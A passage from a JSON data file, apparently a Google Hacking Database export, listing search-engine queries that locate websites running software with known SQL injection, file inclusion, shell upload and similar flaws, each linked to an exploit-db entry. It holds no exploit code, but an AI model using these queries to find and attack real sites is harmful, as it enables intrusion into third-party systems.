description": "Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability - CVE: 2010-1725: http://www.exploit-db.com/exploits/12468", "submited": "2010-11-15", "request": "allinurl:offers_buy.php?id=", "id": 3220}, {"short description": "[ Powered by: RadBids Gold v4 ]", "long description": "RadBIDS GOLD v4 Multiple Remote Vulnerabilities - CVE: 2009-3529: http://www.exploit-db.com/exploits/9194", "submited": "2010-11-15", "request": "[ Powered by: RadBids Gold v4 ]", "id": 3221}, {"short description": "\"/subcat.php?cate_id=\"", "long description": "AJ Auction Pro All Versions (subcat.php) Remote SQL Injection - CVE: 2007-1298: http://www.exploit-db.com/exploits/3408", "submited": "2010-11-15", "request": "\"/subcat.php?cate_id=\"", "id": 3222}, {"short description": "\"Desenvolvido por: Fio Mental\"", "long description": "Fiomental &amp; Coolsis Backoffice Multi Vulnerability: http://www.exploit-db.com/exploits/12563", "submited": "2010-11-15", "request": "\"Desenvolvido por: Fio Mental\"", "id": 3223}, {"short description": "\"Powered by ProjectCMS\"", "long description": "ProjectCMS 1.0b (index.php sn) Remote SQL Injection Vulnerability - CVE: 2009-1500: http://www.exploit-db.com/exploits/8565", "submited": "2010-11-15", "request": "\"Powered by ProjectCMS\"", "id": 3224}, {"short description": "Powered by DorsaCms", "long description": "DorsaCms (ShowPage.aspx) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6810", "submited": "2010-11-15", "request": "Powered by DorsaCms", "id": 3225}, {"short description": "powered by QT-cute v1.2", "long description": "QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12817", "submited": "2010-11-15", "request": "powered by QT-cute v1.2", "id": 3226}, {"short description": "inurl:\"/modules/friendfinder/\"", "long description": "XOOPS Module Friendfinder", "submited": "2010-11-15", "request": "inurl:\"/modules/friendfinder/\"", "id": 3227}, {"short description": "allinurl:forum_answer.php?que_id=", "long description": "AskMe Pro 2.1 (que_id) SQL Injection Vulnerability - CVE: 2007-4085: http://www.exploit-db.com/exploits/12372", "submited": "2010-11-15", "request": "allinurl:forum_answer.php?que_id=", "id": 3228}, {"short description": "1998 - 2010 Video Battle Script", "long description": "PHP Video Battle SQL Injection Vulnerability - CVE: 2010-1701: http://www.exploit-db.com/exploits/12444", "submited": "2010-11-15", "request": "1998 - 2010 Video Battle Script", "id": 3229}, {"short description": "inurl:\"com_facebook\"", "long description": "Joomla com_facebook SQL Injection - CVE: 2009-3438: http://www.exploit-db.com/exploits/9833", "submited": "2010-11-15", "request": "inurl:\"com_facebook\"", "id": 3230}, {"short description": "inurl:/modules/kshop/", "long description": "XOOPS Module Kshop 1.17 (id) Remote SQL Injectio - CVE: 2007-1810: http://www.exploit-db.com/exploits/3626", "submited": "2010-11-15", "request": "inurl:/modules/kshop/", "id": 3231}, {"short description": "\"Jinzora Media Jukebox\"", "long description": "Jinzora 2.7 (include_path) Multiple Remote File Include Vulnerabilities - CVE: 2006-6770: http://www.exploit-db.com/exploits/3003", "submited": "2010-11-15", "request": "\"Jinzora Media Jukebox\"", "id": 3233}, {"short description": "\"Powered by EPay Enterprise\" inurl:\"shop.htm?cid=\" | nurl:\"shop.php?cid=\"", "long description": "EPay Enterprise v4.13 (cid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12353", "submited": "2010-11-15", "request": "\"Powered by EPay Enterprise\" inurl:\"shop.htm?cid=\" | nurl:\"shop.php?cid=\"", "id": 3234}, {"short description": "\"Copyright 2004 easy-content forums\"", "long description": "Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities - CVE: 2006-2697: http://www.exploit-db.com/exploits/1834", "submited": "2010-11-15", "request": "\"Copyright 2004 easy-content forums\"", "id": 3235}, {"short description": "\"Website by WebSolutions.ca\"", "long description": "WsCMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12813", "submited": "2010-11-15", "request": "\"Website by WebSolutions.ca\"", "id": 3236}, {"short description": "inurl:/modules/tinyevent/", "long description": "XOOPS Module Tiny Event 1.01 (id) Remote SQL Injection - CVE: 2007-1811: http://www.exploit-db.com/exploits/3625", "submited": "2010-11-15", "request": "inurl:/modules/tinyevent/", "id": 3238}, {"short description": "Powered by: AIH v2.1", "long description": "Advanced Image Hosting (AIH) 2.1 Remote SQL Injection - CVE: 2008-2536: http://www.exploit-db.com/exploits/5601", "submited": "2010-11-15", "request": "Powered by: AIH v2.1", "id": 3239}, {"short description": "inurl:\"/modules/jobs/\"", "long description": "XOOPS Module Jobs 2.4 (cid) Remote SQL Injection - CVE: 2007-2370: http://www.exploit-db.com/exploits/3672", "submited": "2010-11-15", "request": "inurl:\"/modules/jobs/\"", "id": 3240}, {"short description": "Uploader des fichiers", "long description": "Service d'upload v1.0.0 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10938", "submited": "2010-11-15", "request": "Uploader des fichiers", "id": 3241}, {"short description": "[ Powered By x10media.com ]", "long description": "x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities - CVE: 2009-4730: http://www.exploit-db.com/exploits/9340", "submited": "2010-11-15", "request": "[ Powered By x10media.com ]", "id": 3242}, {"short description": "inurl:/modules/camportail/", "long description": "XOOPS Module Camportail 1.1 (camid) Remote SQL Injection - CVE: 2007-1808: http://www.exploit-db.com/exploits/3629", "submited": "2010-11-15", "request": "inurl:/modules/camportail/", "id": 3243}, {"short description": "Copyright 2007 by Horst-D. Kroller CMS: php WCMS", "long description": "php wcms XT 0.0.7 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-5185: http://www.exploit-db.com/exploits/4477", "submited": "2010-11-15", "request": "Copyright 2007 by Horst-D. Kroller CMS: php WCMS", "id": 3244}, {"short description": "inurl:\"com_booklibrary\"", "long description": "Joomla Book Library 1.0 file inclusion - CVE: 2009-3817: http://www.exploit-db.com/exploits/9889", "submited": "2010-11-15", "request": "inurl:\"com_booklibrary\"", "id": 3245}, {"short description": "inurl:\"/modules/myads/\"", "long description": "XOOPS Module MyAds Bug Fix 2.04jp (index.php) SQL Injection - CVE: 2007-1846: http://www.exploit-db.com/exploits/3603", "submited": "2010-11-15", "request": "inurl:\"/modules/myads/\"", "id": 3246}, {"short description": "\"Powered by Nukedit\"", "long description": "Nukedit 4.9.x Remote Create Admin Exploit - CVE: 2008-5582: http://www.exploit-db.com/exploits/5192", "submited": "2010-11-15", "request": "\"Powered by Nukedit\"", "id": 3247}, {"short description": "\"Ladder Scripts by http://www.mygamingladder.com\"", "long description": "My Gaming Ladder Combo System 7.0 Remote Code Execution - CVE: 2006-2002: http://www.exploit-db.com/exploits/1707", "submited": "2010-11-15", "request": "\"Ladder Scripts by http://www.mygamingladder.com\"", "id": 3248}, {"short description": "Powered By PHPDug version 2.0.0", "long description": "PHPDug version 2.0.0 Cross Site Scripting Vulnerability: http://www.exploit-db.com/exploits/11017", "submited": "2010-11-15", "request": "Powered By PHPDug version 2.0.0", "id": 3249}, {"short description": "allinurl:show_memorial.php?id=", "long description": "Memorial Web Site Script (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12351", "submited": "2010-11-15", "request": "allinurl:show_memorial.php?id=", "id": 3250}, {"short description": "intext:Powered by Mobilelib Gold v3", "long description": "Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities - CVE: 2009-2788: http://www.exploit-db.com/exploits/9327", "submited": "2010-11-15", "request": "intext:Powered by Mobilelib Gold v3", "id": 3251}, {"short description": "\"php-addressbook\"", "long description": "PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities - CVE: 2008-2565: http://www.exploit-db.com/exploits/9023", "submited": "2010-11-15", "request": "\"php-addressbook\"", "id": 3252}, {"short description": "inurl:\"com_jsjobs\"", "long description": "Joomla Component com_jsjobs 1.0.5.6 SQL Injection Vulnerabilities - CVE: 2009-4599: http://www.exploit-db.com/exploits/10366", "submited": "2010-11-15", "request": "inurl:\"com_jsjobs\"", "id": 3253}, {"short description": "inurl:com_iproperty", "long description": "Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability - CVE: 2010-1721: http://www.exploit-db.com/exploits/12246", "submited": "2010-11-15", "request": "inurl:com_iproperty", "id": 3254}, {"short description": "index.php?option=com_altas", "long description": "Joomla Component altas 1.0 Multiple Remote SQL Injection: http://www.exploit-db.com/exploits/6002", "submited": "2010-11-15", "request": "index.php?option=com_altas", "id": 3255}, {"short description": "inurl:\"index.php?module=pnFlashGames\"", "long description": "PostNuke Module pnFlashGames 2.5 SQL Injection Vulnerabilities - CVE: 2008-2013: http://www.exploit-db.com/exploits/5500", "submited": "2010-11-15", "request": "inurl:\"index.php?module=pnFlashGames\"", "id": 3256}, {"short description": "Design by Satcom Co", "long description": "Eshopbuilde CMS SQL Injection Vulnerability - CVE: 2009-4155: http://www.exploit-db.com/exploits/10253", "submited": "2010-11-15", "request": "Design by Satcom Co", "id": 3257}, {"short description": "intitle:\"ppc engine admin login form\"", "long description": "PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities - CVE: 2007-0167: http://www.exploit-db.com/exploits/3104", "submited": "2010-11-15", "request": "intitle:\"ppc engine admin login form\"", "id": 3258}, {"short description": "\"powered by Albinator\"", "long description": "Albinator 2.0.6 (Config_rootdir) Remote File Inclusion - CVE: 2006-2182: http://www.exploit-db.com/exploits/1744", "submited": "2010-11-15", "request": "\"powered by Albinator\"", "id": 3260}, {"short description": "Powered by Gbook MX v4.1.0 2003 Magtrb Soft", "long description": "Gbook MX v4.1.0 Arabic Version File Inclusion Vulnerability: http://www.exploit-db.com/exploits/10986", "submited": "2010-11-15", "request": "Powered by Gbook MX v4.1.0 2003 Magtrb Soft", "id": 3262}, {"short description": "inurl:\"/modules/library/\"", "long description": "XOOPS Module Library (viewcat.php) Remote SQL Injectio - CVE: 2007-1815: http://www.exploit-db.com/exploits/3619", "submited": "2010-11-15", "request": "inurl:\"/modules/library/\"", "id": 3263}, {"short description": "inurl:\"/modules/repository/\"", "long description": "XOOPS Module Repository (viewcat.php) Remote SQL Injection - CVE: 2007-1847: http://www.exploit-db.com/exploits/3612", "submited": "2010-11-15", "request": "inurl:\"/modules/repository/\"", "id": 3264}, {"short description": "Powered by SLAED CMS 2005-2008 SLAED. All rights reserved.", "long description": "Slaed CMS v4 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11596", "submited": "2010-11-15", "request": "Powered by SLAED CMS 2005-2008 SLAED. All rights reserved.", "id": 3265}, {"short description": "index.php?option=com_vr", "long description": "Joomla Component QuickTime VR 0.1 Remote SQL Injection: http://www.exploit-db.com/exploits/5994", "submited": "2010-11-15", "request": "index.php?option=com_vr", "id": 3266}, {"short description": "\"BioScripts\"", "long description": "MiniTwitter 0.2b Multiple SQL Injection Vulnerabilities - CVE: 2009-2573: http://www.exploit-db.com/exploits/8586", "submited": "2010-11-15", "request": "\"BioScripts\"", "id": 3268}, {"short description": "myAlbum-P 2.0", "long description": "XOOPS Module myAlbum-P", "submited": "2010-11-15", "request": "myAlbum-P 2.0", "id": 3270}, {"short description": "[ Software Directory Powered by SoftDirec 1.05 ]", "long description": "Soft Direct v1.05 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11189", "submited": "2010-11-15", "request": "[ Software Directory Powered by SoftDirec 1.05 ]", "id": 3271}, {"short description": "powered by vBulletin 3.8.6", "long description": "vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability: http://www.exploit-db.com/exploits/14455", "submited": "2010-11-15", "request": "powered by vBulletin 3.8.6", "id": 3272}, {"short description": "\"By Geeklog\" \"Created this page in\" +seconds +powered", "long description": "Geeklog v1.6.0sr2 - Remote File Upload: http://www.exploit-db.com/exploits/9855", "submited": "2010-11-15", "request": "\"By Geeklog\" \"Created this page in\" +seconds +powered", "id": 3274}, {"short description": "inurl:\"xampp/biorhythm.php\"", "long description": "XAMPP 1.7.3 multiple vulnerabilites: http://www.exploit-db.com/exploits/15370", "submited": "2010-11-15", "request": "inurl:\"xampp/biorhythm.php\"", "id": 3275}, {"short description": "Powered by 2532|Gigs v1.2.2", "long description": "2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities - CVE: 2008-6901: http://www.exploit-db.com/exploits/7510", "submited": "2010-11-15", "request": "Powered by 2532|Gigs v1.2.2", "id": 3276}, {"short description": "\"Powered by bp blog 6.0\"", "long description": "BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability - CVE: 2008-2554: http://www.exploit-db.com/exploits/5705", "submited": "2010-11-15", "request": "\"Powered by bp blog 6.0\"", "id": 3277}, {"short description": "inurl:\"com_soundset\"", "long description": "Joomla CB Resume Builder SQL Injection - CVE: 2009-3645: http://www.exploit-db.com/exploits/10064", "submited": "2010-11-15", "request": "inurl:\"com_soundset\"", "id": 3278}, {"short description": "inurl:\"/modules/zmagazine/\"", "long description": "XOOPS Module Zmagazine 1.0 (print.php) Remote SQL Injection - CVE: 2005-0725: http://www.exploit-db.com/exploits/3646", "submited": "2010-11-15", "request": "inurl:\"/modules/zmagazine/\"", "id": 3279}, {"short description": "Powered by iScripts eSwap.", "long description": "iScripts eSwap v2.0 sqli and xss vulnerability: http://www.exploit-db.com/exploits/13740", "submited": "2010-11-15", "request": "Powered by iScripts eSwap.", "id": 3281}, {"short description": "\"Powered by Online Grades\"", "long description": "Online Grades &amp; Attendance 3.2.6 Multiple Local File Inclusion Vulns - CVE: 2009-2037: http://www.exploit-db.com/exploits/8853", "submited": "2010-11-15", "request": "\"Powered by Online Grades\"", "id": 3282}, {"short description": "inurl:/modules/wflinks", "long description": "XOOPS Module WF-Links 1.03 (cid) Remote SQL Injection - CVE: 2007-2373: http://www.exploit-db.com/exploits/3670", "submited": "2010-11-15", "request": "inurl:/modules/wflinks", "id": 3283}, {"short description": "inurl:\"/modules/glossaire/\"", "long description": "XOOPS Module Glossarie", "submited": "2010-11-15", "request": "inurl:\"/modules/glossaire/\"", "id": 3285}, {"short description": "index.php?option=com_is", "long description": "Joomla Component is 1.0.1 Multiple Remote SQL Injection: http://www.exploit-db.com/exploits/5995", "submited": "2010-11-15", "request": "index.php?option=com_is", "id": 3286}, {"short description": "inurl:\"/modules/myconference/\"", "long description": "XOOPS Module MyConference 1.0 (index.php) SQL Injection - CVE: 2007-2737: http://www.exploit-db.com/exploits/3933", "submited": "2010-11-15", "request": "inurl:\"/modules/myconference/\"", "id": 3287}, {"short description": "inurl:\"com_gameserver\"", "long description": "Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability - CVE: 2009-3063: http://www.exploit-db.com/exploits/9571", "submited": "2010-11-15", "request": "inurl:\"com_gameserver\"", "id": 3288}, {"short description": "Powered by Ninja Designs This is a port of WordPress", "long description": "Ninja Blog v4.8 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/10991", "submited": "2010-11-15", "request": "Powered by Ninja Designs This is a port of WordPress", "id": 3289}, {"short description": "inurl:com_annonces", "long description": "Joomla Component com_annonces Upload Vulnerability: http://www.exploit-db.com/exploits/13748", "submited": "2010-11-15", "request": "inurl:com_annonces", "id": 3290}, {"short description": "Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved", "long description": "VP-ASP Shopping Cart 7.0 DB Download Vulnerability: http://www.exploit-db.com/exploits/11018", "submited": "2010-11-15", "request": "Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved", "id": 3294}, {"short description": "inurl:\"fclick.php?fid\"", "long description": "Fast Click (1.1.3 , 2.3.8) (show.php) Remote File Inclusion - CVE: 2006-2175: http://www.exploit-db.com/exploits/1740", "submited": "2010-11-15", "request": "inurl:\"fclick.php?fid\"", "id": 3295}, {"short description": "inurl:\"/modules/wfsection/\"", "long description": "http://www.exploit-db.com/exploits/3644", "submited": "2010-11-15", "request": "inurl:\"/modules/wfsection/\"", "id": 3296}, {"short description": "Powered by Forums W-Agora", "long description": "W-Agora v.4.2.1 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/10999", "submited": "2010-11-15", "request": "Powered by Forums W-Agora", "id": 3297}, {"short description": "intext:\"phpbb - auction\" inurl:\"auction\"", "long description": "Auction 1.3m (phpbb_root_path) Remote File Include - CVE: 2006-2245: http://www.exploit-db.com/exploits/1747", "submited": "2010-11-15", "request": "intext:\"phpbb - auction\" inurl:\"auction\"", "id": 3298}, {"short description": "\"powered by DreamAccount 3.1\"", "long description": "DreamAccount 3.1 (auth.api.php) Remote File Include - CVE: 2006-6232: http://www.exploit-db.com/exploits/1954", "submited": "2010-11-15", "request": "\"powered by DreamAccount 3.1\"", "id": 3301}, {"short description": "allinurl:\"article.download.php\"", "long description": "Star Articles 6.0 Remote File Upload Vulnerability - CVE: 2008-7076: http://www.exploit-db.com/exploits/7251", "submited": "2010-11-15", "request": "allinurl:\"article.download.php\"", "id": 3302}, {"short description": "inurl:com_jp_jobs", "long description": "Joomla Component com_jp_jobs 1.2.0 (id) SQL Injection Vulnerability - CVE: 2010-1350: http://www.exploit-db.com/exploits/12191", "submited": "2010-11-15", "request": "inurl:com_jp_jobs", "id": 3304}, {"short description": "intitle:admbook intitle:version filetype:php", "long description": "Admbook 1.2.2 (X-Forwarded-For) Remote Command Execution - CVE: 2006-0852: http://www.exploit-db.com/exploits/1512", "submited": "2010-11-15", "request": "intitle:admbook intitle:version filetype:php", "id": 3306}, {"short description": "\"Cms.tut.su, 2009 g.\"", "long description": "CMS Chainuk 1.2 Multiple Remote Vulnerabilities - CVE: 2009-2333: http://www.exploit-db.com/exploits/9069", "submited": "2010-11-15", "request": "\"Cms.tut.su, 2009 g.\"", "id": 3307}, {"short description": "inurl:\"com_icrmbasic\"", "long description": "Joomla IRCm Basic SQL Injection: http://www.exploit-db.com/exploits/9812", "submited": "2010-11-15", "request": "inurl:\"com_icrmbasic\"", "id": 3308}, {"short description": "\"Powered By Aqua Cms\"", "long description": "Aqua CMS (username) SQL Injection Vulnerability - CVE: 2009-1317: http://www.exploit-db.com/exploits/8432", "submited": "2010-11-15", "request": "\"Powered By Aqua Cms\"", "id": 3309}, {"short description": "inurl:\"com_jbudgetsmagic\"", "long description": "Joomla com_jbudgetsmagic SQL injection vulnerability - CVE: 2009-3332: http://www.exploit-db.com/exploits/9723", "submited": "2010-11-15", "request": "inurl:\"com_jbudgetsmagic\"", "id": 3310}, {"short description": "inurl:\"com_soundset\"", "long description": "Joomla Soundset 1.0 SQL Injection - CVE: 2009-3644: http://www.exploit-db.com/exploits/10067", "submited": "2010-11-15", "request": "inurl:\"com_soundset\"", "id": 3311}, {"short description": "Powered by MyPHP Forum v3.0", "long description": "MyPHP Forum 3.0 (Final) Remote SQL Injection Vulnerability - CVE: 2008-0099: http://www.exploit-db.com/exploits/4831", "submited": "2010-11-15", "request": "Powered by MyPHP Forum v3.0", "id": 3312}, {"short description": "\"Powered by CMS.GE\"", "long description": "Binn SBuilder (nid) Remote Blind SQL Injection Vulnerability - CVE: 2008-0253: http://www.exploit-db.com/exploits/4904", "submited": "2010-11-15", "request": "\"Powered by CMS.GE\"", "id": 3313}, {"short description": "index.php?option=com_mambads", "long description": "Mambo Component mambads", "submited": "2010-11-15", "request": "index.php?option=com_mambads", "id": 3314}, {"short description": "\"AlumniServer project\"", "long description": "AlumniServer 1.0.1 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9019", "submited": "2010-11-15", "request": "\"AlumniServer project\"", "id": 3315}, {"short description": "\"Site powered by GuppY\"", "long description": "GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion Vulnerability - CVE: 2007-5844: http://www.exploit-db.com/exploits/4602", "submited": "2010-11-15", "request": "\"Site powered by GuppY\"", "id": 3316}, {"short description": "inurl:\"com_surveymanager\"", "long description": "Joomla com_surveymanager SQL injection vulnerability - CVE: 2009-3325: http://www.exploit-db.com/exploits/9721", "submited": "2010-11-15", "request": "inurl:\"com_surveymanager\"", "id": 3318}, {"short description": "Powered by PHP F1 (Max's Image Uploader)", "long description": "Max's Image Uploader Shell Upload Vulnerability - CVE: 2010-0390: http://www.exploit-db.com/exploits/11169", "submited": "2010-11-15", "request": "Powered by PHP F1 (Max&#039;s Image Uploader)", "id": 3319}, {"short description": "inurl:\"?option=com_bsadv\"", "long description": "Joomla Boy Scout Advancement 0.3 (id) SQL Injection - CVE: 2009-2290: http://www.exploit-db.com/exploits/8779", "submited": "2010-11-15", "request": "inurl:\"?option=com_bsadv\"", "id": 3320}, {"short description": "\"Powered by PHP Live! v3.3\"", "long description": "PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability - CVE: 2009-3062: http://www.exploit-db.com/exploits/9578", "submited": "2010-11-15", "request": "\"Powered by PHP Live! v3.3\"", "id": 3321}, {"short description": "Powered by PHP F1 (Max's Photo Album)", "long description": "Max's Photo Album Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11557", "submited": "2010-11-15", "request": "Powered by PHP F1 (Max&#039;s Photo Album)", "id": 3322}, {"short description": "insite: SmarterMail Enterprise 7.1", "long description": "SmarterMail 7.1.3876 Directory Traversal Vulnerability - CVE: 2010-3486: http://www.exploit-db.com/exploits/15048", "submited": "2010-11-15", "request": "insite: SmarterMail Enterprise 7.1", "id": 3323}, {"short description": "\"Powered by LightNEasy\"", "long description": "LightNEasy 3.1.x Multiple Vulnerabilite: http://www.exploit-db.com/exploits/12322", "submited": "2010-11-15", "request": "\"Powered by LightNEasy\"", "id": 3324}, {"short description": "\"Powered by Online Grades\"", "long description": "Online Grades &amp; Attendance 3.2.6 Multiple SQL Injection Vulnerabilities - CVE: 2009-2598: http://www.exploit-db.com/exploits/8844", "submited": "2010-11-15", "request": "\"Powered by Online Grades\"", "id": 3325}, {"short description": "\"Copyright KerviNet\"", "long description": "KerviNet Forum 1.1 Multiple Remote Vulnerabilities - CVE: 2009-2326: http://www.exploit-db.com/exploits/9068", "submited": "2010-11-15", "request": "\"Copyright KerviNet\"", "id": 3326}, {"short description": "allinurl:option=com_rsmonials", "long description": "Joomla Component rsmonials Remote Cross Site Scripting: http://www.exploit-db.com/exploits/8517", "submited": "2010-11-15", "request": "allinurl:option=com_rsmonials", "id": 3328}, {"short description": "\"Powered by F3Site\"", "long description": "F3Site 2.1 Remote Code Execution - CVE: 2007-0763: http://www.exploit-db.com/exploits/3255", "submited": "2010-11-15", "request": "\"Powered by F3Site\"", "id": 3329}, {"short description": "\"Powered by ProjectCMS\"", "long description": "ProjectCMS 1.1b Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8608", "submited": "2010-11-15", "request": "\"Powered by ProjectCMS\"", "id": 3331}, {"short description": "\"Powered by PunBB\"", "long description": "PunBB Extension Attachment 1.0.2 SQL Injection: http://www.exploit-db.com/exploits/9849", "submited": "2010-11-15", "request": "\"Powered by PunBB\"", "id": 3332}, {"short description": "\"The Merchant Project\"", "long description": "The Merchant", "submited": "2010-11-15", "request": "\"The Merchant Project\"", "id": 3334}, {"short description": "\"Developed by rbk\"", "long description": "InfiniX 1.2.003 Multiple SQL Injection Vulnerabilities - CVE: 2009-2451: http://www.exploit-db.com/exploits/8558", "submited": "2010-11-15", "request": "\"Developed by rbk\"", "id": 3335}, {"short description": "Powered by Elvin Bug Tracking Server.", "long description": "Elvin BTS 1.2.0 Multiple Remote Vulnerabilities - CVE: 2009-2123: http://www.exploit-db.com/exploits/8953", "submited": "2010-11-15", "request": "Powered by Elvin Bug Tracking Server.", "id": 3338}, {"short description": "intitle:\"Directory Listing For /\" + inurl:webdav tomcat", "long description": "Apache Tomcat (webdav) Remote File Disclosure: http://www.exploit-db.com/exploits/4552", "submited": "2010-11-15", "request": "intitle:\"Directory Listing For /\" + inurl:webdav tomcat", "id": 3339}, {"short description": "Powered By PHPFanBase", "long description": "PHPFanBase 2.x (protection.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2957", "submited": "2010-11-15", "request": "Powered By PHPFanBase", "id": 3340}, {"short description": "\"Powered by wpQuiz\"", "long description": "wpQuiz 2.7 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-6172: http://www.exploit-db.com/exploits/4668", "submited": "2010-11-15", "request": "\"Powered by wpQuiz\"", "id": 3341}, {"short description": "inurl:\"com_ezine\"", "long description": "Joomla / Mambo Component com_ezine v2.1 Remote File Include Vulnerability - CVE: 2009-4094: http://www.exploit-db.com/exploits/10178", "submited": "2010-11-15", "request": "inurl:\"com_ezine\"", "id": 3343}, {"short description": "\"Powered by ClanTiger\"", "long description": "ClanTiger 1.1.1 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8472", "submited": "2010-11-15", "request": "\"Powered by ClanTiger\"", "id": 3346}, {"short description": "\"Search Projects\" intitle:\"The ultimate project website\"", "long description": "Softbiz Freelancers Script v.1 Remote SQL Injection - CVE: 2007-6124: http://www.exploit-db.com/exploits/4660", "submited": "2010-11-15", "request": "\"Search Projects\" intitle:\"The ultimate project website\"", "id": 3347}, {"short description": "\"Power by:RichStrong CMS\"", "long description": "RichStrong CMS (showproduct.asp cat) Remote SQL Injection - CVE: 2008-0291: http://www.exploit-db.com/exploits/4910", "submited": "2010-11-15", "request": "\"Power by:RichStrong CMS\"", "id": 3348}, {"short description": "powered:powered by CMS", "long description": "TinyMCE WYSIWYG Editor Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11358", "submited": "2010-11-15", "request": "powered:powered by CMS", "id": 3350}, {"short description": "\"Powered by Grayscale Blog\"", "long description": "Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns - CVE: 2007-1432: http://www.exploit-db.com/exploits/3447", "submited": "2010-11-15", "request": "\"Powered by Grayscale Blog\"", "id": 3351}, {"short description": "Powered by UCenter 1.5.0 2001 - 2008 Comsenz Inc.", "long description": "Ucenter Projekt 2.0 Insecure crossdomain (XSS) Vulnerability: http://www.exploit-db.com/exploits/12455", "submited": "2010-11-15", "request": "Powered by UCenter 1.5.0 2001 - 2008 Comsenz Inc.", "id": 3353}, {"short description": "inurl:roschedule.php", "long description": "phpScheduleIt 1.2.10 (reserve.php) Remote Code Execution - CVE: 2008-6132: http://www.exploit-db.com/exploits/6646", "submited": "2010-11-15", "request": "inurl:roschedule.php", "id": 3354}, {"short description": "\"PHP Project Management 0.8.10\"", "long description": "PHP Project Management 0.8.10 Multiple RFI / LFI Vulnerabilities - CVE: 2007-5641: http://www.exploit-db.com/exploits/4549", "submited": "2010-11-15", "request": "\"PHP Project Management 0.8.10\"", "id": 3355}, {"short description": "inurl:com_seyret", "long description": "Joomla Seyret Video Component (com_seyret) Blind SQL Injection: http://www.exploit-db.com/exploits/14172", "submited": "2010-11-15", "request": "inurl:com_seyret", "id": 3356}, {"short description": "\"download this free gallery at matteobinda.com\"", "long description": "ASP Photo Gallery 1.0 Multiple SQL Injection Vulnerabilities - CVE: 2008-0256: http://www.exploit-db.com/exploits/4900", "submited": "2010-11-15", "request": "\"download this free gallery at matteobinda.com\"", "id": 3359}, {"short description": "Powered by Dodo, Bubo &amp; Misty. Feed us!", "long description": "Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability: http://www.exploit-db.com/exploits/11460", "submited": "2010-11-15", "request": "Powered by Dodo, Bubo &amp; Misty. Feed us!", "id": 3361}, {"short description": "Nwahy.com 2.1 , inurl:'add-site.html'", "long description": "Nwahy Dir 2.1 Arbitrary Change Admin Password: http://www.exploit-db.com/exploits/9087", "submited": "2010-11-15", "request": "Nwahy.com 2.1 , inurl:&#039;add-site.html&#039;", "id": 3363}, {"short description": "inurl:index.php?option=com_jombib", "long description": "Joomla Component BibTeX 1.3 Remote Blind SQL Injection - CVE: 2007-4502: http://www.exploit-db.com/exploits/4310", "submited": "2010-11-15", "request": "inurl:index.php?option=com_jombib", "id": 3364}, {"short description": "allinurl:\"shop.htm?shopMGID=\"", "long description": "CMS Ignition SQL Injection: http://www.exploit-db.com/exploits/14471", "submited": "2010-11-15", "request": "allinurl:\"shop.htm?shopMGID=\"", "id": 3366}, {"short description": "\"By Geeklog\" \"Created this page in\" +seconds +powered inurl:public_html", "long description": "Geeklog 1.6.0sr1 Remote Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/9505", "submited": "2010-11-15", "request": "\"By Geeklog\" \"Created this page in\" +seconds +powered inurl:public_html", "id": 3367}, {"short description": "\"nukeai beta3\"", "long description": "PHP-Nuke NukeAI Module 3b (util.php) Remote File Include - CVE: 2006-6255: http://www.exploit-db.com/exploits/2843", "submited": "2010-11-15", "request": "\"nukeai beta3\"", "id": 3368}, {"short description": "\"Powered by UPB\"", "long description": "Ultimate PHP Board 2.0b1 (chat/login.php) Code Execution: http://www.exploit-db.com/exploits/2999", "submited": "2010-11-15", "request": "\"Powered by UPB\"", "id": 3369}, {"short description": "intitle:\"owl intranet * owl\" 0.82", "long description": "OWL Intranet Engine 0.82 (xrms_file_root) Code Execution - CVE: 2006-1149: http://www.exploit-db.com/exploits/1561", "submited": "2010-11-15", "request": "intitle:\"owl intranet * owl\" 0.82", "id": 3370}, {"short description": "Copyright 2006-2009 Insane Visions", "long description": "AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/10249", "submited": "2010-11-15", "request": "Copyright 2006-2009 Insane Visions", "id": 3371}, {"short description": "\"powered by JAMM\"", "long description": "JAMM CMS (id) Remote Blind SQL Injection - CVE: 2008-2755: http://www.exploit-db.com/exploits/5789", "submited": "2010-11-15", "request": "\"powered by JAMM\"", "id": 3372}, {"short description": "inurl:\"printable_pedigree.php\"", "long description": "Dog Pedigree Online Database 1.0.1b Multiple SQL Injection: http://www.exploit-db.com/exploits/8738", "submited": "2010-11-15", "request": "inurl:\"printable_pedigree.php\"", "id": 3373}, {"short description": "intext:\"Powered by Lore 1.5.6\"", "long description": "re 1.5.6 (article.php) Blind SQL Injection: 